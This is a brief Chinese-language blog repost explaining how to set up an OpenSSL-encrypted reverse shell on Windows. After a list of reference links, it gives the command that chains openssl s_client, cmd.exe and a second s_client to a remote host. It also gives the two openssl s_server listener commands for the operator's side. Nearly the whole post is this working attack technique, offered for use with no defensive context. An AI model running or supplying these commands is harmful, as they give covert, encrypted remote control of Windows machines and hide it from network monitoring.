系统相关
首页 > 系统相关> > Windows下使用Openssl加密反弹SHELL

Windows下使用Openssl加密反弹SHELL

作者:互联网

Windows下使用Openssl加密反弹SHELL

参考链接:

https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/

https://www.madboa.com/geek/openssl/

https://superhero.ninja/2015/07/22/create-a-simple-https-server-with-openssl-s_server/

https://blog.inequationgroup.com/openssl-nc/

https://www.cnblogs.com/heycomputer/articles/10697865.html

操作命令

openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]
以上命令会从 [ip]:[port1] 获取命令发送给 cmd.exe执行,然后把结果返回到 [ip]:[port2]
因此在本机需要启动两个 s_server从 port1 发送命令到 cmd
从 port1 发送命令到 cmd
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port1] 
从 port2 获取发送给 port1 的命令执行结果
openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]

标签:SHELL,Windows,ip,Openssl,openssl,quiet,https,server,port1
来源: https://www.cnblogs.com/0xd3ac/p/12130998.html